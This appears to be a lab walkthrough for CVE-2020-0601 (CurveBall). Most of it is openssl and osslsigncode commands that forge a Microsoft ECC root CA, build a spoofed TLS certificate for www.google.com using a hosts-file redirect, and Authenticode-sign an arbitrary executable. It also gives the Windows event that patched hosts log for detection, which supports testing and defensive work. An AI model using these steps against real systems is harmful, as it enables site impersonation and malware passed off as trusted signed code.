Walkthrough for CVE-2020-0601 (CurveBall), based on these PoCs: https://github.com/ly4k/CurveBall
https://research.kudelskisecurity.com/2020/01/15/cve-2020-0601-the-chainoffools-attack-explained-with-poc/
Versions used: Python 3.11, OpenSSL 3.1, osslsigncode 2.5. The Python libraries required are the ones imported by gen-key.py and httpServer.py.
# --- TLS server-certificate walkthrough ---
# Derive a CA private key from the exported Microsoft ECC Product Root CA certificate.
# NOTE(review): gen-key.py is not shown here; it presumably writes spoofed-ca-key.pem,
# which the next command reads. Confirm against the script.
python gen-key.py MicrosoftECCProductRootCertificateAuthority.cer
# Create a self-signed CA certificate (spoofed-ca.pem) from that key, using the settings in ca.cnf.
openssl req -new -x509 -key spoofed-ca-key.pem -out spoofed-ca.pem -config ca.cnf
# Generate a fresh NIST P-384 (secp384r1) private key for the leaf certificate.
openssl ecparam -name secp384r1 -genkey -noout -out cert.key
# Build a CSR for the leaf key; the v3_req request extensions come from openssl.cnf.
openssl req -new -key cert.key -out cert.csr -config openssl.cnf -reqexts v3_req
# Sign the CSR with the CA from the second step, producing cert.crt (valid for 10000 days).
# -CAcreateserial creates the CA serial-number file if it does not exist yet.
openssl x509 -req -in cert.csr -CA spoofed-ca.pem -CAkey spoofed-ca-key.pem -CAcreateserial -out cert.crt -days 10000 -extfile openssl.cnf -extensions v3_req
# Start the HTTPS test server.
# NOTE(review): httpServer.py is not shown; presumably it serves cert.crt / cert.key. Confirm.
python httpServer.py
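Add the line `<kali.machine.ip> www.google.com` to the hosts file of the test client, so that www.google.com resolves to the machine running httpServer.py.
Then visit https://www.google.com from that client.
A Windows host with the January 2020 security update for CVE-2020-0601 installed rejects this certificate chain and records Event ID 1 from source Microsoft-Windows-Audit-CVE in the Application log; that event is the signal to alert on.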
# --- Code-signing (Authenticode) walkthrough ---
# Same key / CA / CSR / sign sequence as the TLS commands earlier in this file, but with
# ca-cs.cnf and openssl-cs.cnf in place of ca.cnf and openssl.cnf.
# The output names are identical, so spoofed-ca.pem, cert.key, cert.csr and cert.crt from
# the TLS run are overwritten. Presumably spoofed-ca-key.pem is too; gen-key.py is not shown.
python gen-key.py MicrosoftECCProductRootCertificateAuthority.cer
# Self-signed CA certificate, this time configured by ca-cs.cnf.
openssl req -new -x509 -key spoofed-ca-key.pem -out spoofed-ca.pem -config ca-cs.cnf
# Fresh NIST P-384 (secp384r1) private key for the signing certificate.
openssl ecparam -name secp384r1 -genkey -noout -out cert.key
# CSR for the signing key; the v3_req request extensions come from openssl-cs.cnf.
openssl req -new -key cert.key -out cert.csr -config openssl-cs.cnf -reqexts v3_req
# Sign the CSR with the CA above, producing cert.crt (valid for 10000 days).
openssl x509 -req -in cert.csr -CA spoofed-ca.pem -CAkey spoofed-ca-key.pem -CAcreateserial -out cert.crt -days 10000 -extfile openssl-cs.cnf -extensions v3_req
# Bundle the leaf certificate, its private key and the CA certificate into a PKCS#12 file
# (cert.p12) with the friendly name "Code Signing".
openssl pkcs12 -export -in cert.crt -inkey cert.key -certfile spoofed-ca.pem -name "Code Signing" -out cert.p12
# Authenticode-sign filename.exe with the PKCS#12 bundle; -n sets the signature description.
# Defender note: on a Windows host patched for CVE-2020-0601, the signature on
# filename_signed.exe should fail chain validation.
osslsigncode sign -pkcs12 cert.p12 -n "Signed by curveball" -in filename.exe -out filename_signed.exe